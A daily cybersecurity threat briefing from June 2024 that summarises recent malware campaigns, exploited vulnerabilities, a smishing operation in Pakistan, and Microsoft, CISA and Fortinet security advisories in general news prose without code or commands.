Cookie Settings

This website uses cookies and similar technologies to provide essential functionality and improve your experience. Some features, such as demo scheduling and chat support, require marketing cookies to function. By clicking "Accept All", you consent to all cookies. Alternatively, you can customize your preferences, but note that declining marketing cookies will limit certain website features.

Cyware Daily Threat Intelligence

Cyware Daily Threat Intelligence - Featured Image

Daily Threat Briefing Jun 12, 2024

Imagine, if you will, an email arriving in your inbox, adorned with promises of career advancement and lucrative opportunities. But beware! Enter Warmcookie, a new Windows malware that sneaks into corporate networks through fake job offer phishing lures. Once activated, it conducts extensive machine fingerprinting, captures screenshots, and deploys additional payloads.

Microsoft's Patch Tuesday has rolled out, tackling a whopping 49 vulnerabilities. Among these, a critical flaw in MSMQ stands out like a glaring beacon. But that's not all. In the mix is a publicly disclosed zero-day vulnerability in DNSSEC validation.

The Smishing Triad, a notorious threat group, has broadened its sinister reach to Pakistan. Its latest ploy targets mobile carrier customers with deceptive messages that masquerade as official communications from Pakistan Post. In a bid to slip past detection, the group employs local phone numbers and domain names, blending seamlessly into the digital landscape.

Top Malware Reported in the Last 24 Hours

Don’t be fooled by Warmcookie

A new Windows malware called Warmcookie is being distributed through fake job offer phishing campaigns to infiltrate corporate networks. The malware is capable of extensive machine fingerprinting, capturing screenshots, and deploying additional payloads. The phishing emails contain links to fake job platforms that redirect to malicious landing pages. Once executed, the malware establishes communication with a C2 server, collects victim information, captures screenshots, executes commands, and evades analysis environments.

Fake shipping lures drop Remcos RAT

Researchers spotted a new phishing campaign where threat actors are distributing Remcos RAT using UUEncoding file attachments in emails related to importing or exporting shipments. The UUEncoding files contain an obfuscated VBS script, which, when decoded, saves and executes a PowerShell script that ultimately downloads the Remcos RAT malware. The malware collects system information and keylogging data, sending it to a remote command-and-control server.

Top Vulnerabilities Reported in the Last 24 Hours

TellYouThePass abuses PHP bug

The TellYouThePass ransomware group exploited a critical flaw in PHP on Windows servers after a proof-of-concept script was released. The attackers used the flaw to execute arbitrary code, deploying ransomware through webshell uploads and launching attacks using mshta.exe. The ransomware sends details about infected machines to a command-and-control server and then publishes a ransom message in the web directory.

**Chinese Fortigate campaign **

The Dutch NCSC warned that a Chinese cyber-espionage campaign, targeting vulnerable Fortigate network security appliances, is larger than initially known. Chinese hackers exploited a critical flaw in FortiOS/FortiProxy, breaching thousands of systems belonging to Western governments, international organizations, and defense contractors. The hackers deployed a previously unknown malware that can persist despite security upgrades, potentially allowing access to sensitive data. Organizations are urged to apply measures to limit the impact of successful digital attacks.

JetBrains warns of IntelliJ IDE flaw

JetBrains issued a warning about a critical vulnerability affecting its IntelliJ IDEs, resulting in exposure of GitHub access tokens. The security flaw, tracked as CVE-2024-37051, affects IntelliJ-based IDEs from version 2023.1 onwards when the JetBrains GitHub plugin is enabled. JetBrains has released security updates to fix the vulnerability and has removed impacted versions from its plugin marketplace. Users are urged to update their IDEs and revoke any GitHub tokens used with the vulnerable plugin.

Top Scams Reported in the Last 24 Hours

Smishing Triad targets Pakistan

The Smishing Triad threat group has expanded its operations to Pakistan, targeting mobile carrier customers with fraudulent messages appearing to be from Pakistan Post. The messages prompt victims to provide personal and financial information under the guise of paying for a package. The group's activity involves using local phone numbers and domain names to evade detection. The National Cyber Emergency Response Team of Pakistan has issued a security advisory to citizens to protect themselves.

**CISA Advisories **

Microsoft June 2024 Patch Tuesday

Microsoft's June 2024 Patch Tuesday addressed 49 vulnerabilities, including a critical Microsoft Message Queuing (MSMQ) RCE flaw (CVE-2024-30080) and a publicly disclosed zero-day DNSSEC validation vulnerability (CVE-2023-50868). Additionally, a Windows Wi-Fi Driver vulnerability was identified, allowing remote code execution within Wi-Fi range. The MSMQ bug has a severity rating of 9.8.

**ICS security advisories **

CISA released six ICS advisories on June 11, addressing security issues, vulnerabilities, and exploits in Industrial Control Systems (ICS). The affected products include Rockwell Automation ControlLogix, GuardLogix, and CompactLogix; AVEVA PI Web API and PI Asset Framework Client; Intrado 911 Emergency Gateway; Schneider Electric APC Easy UPS Online Monitoring Software; and MicroDicom DICOM Viewer. The CISA encourages users and administrators to review the advisories for technical details and mitigations.

Fortinet security update

Fortinet has released security updates to fix a vulnerability in FortiOS, which could allow cyber threat actors to take control of affected systems. The vulnerability is a multiple buffer overflow in the Diag Npu Command. Users and administrators are encouraged to review the Fortinet Security Bulletin and apply the necessary updates.

Related Threat Briefings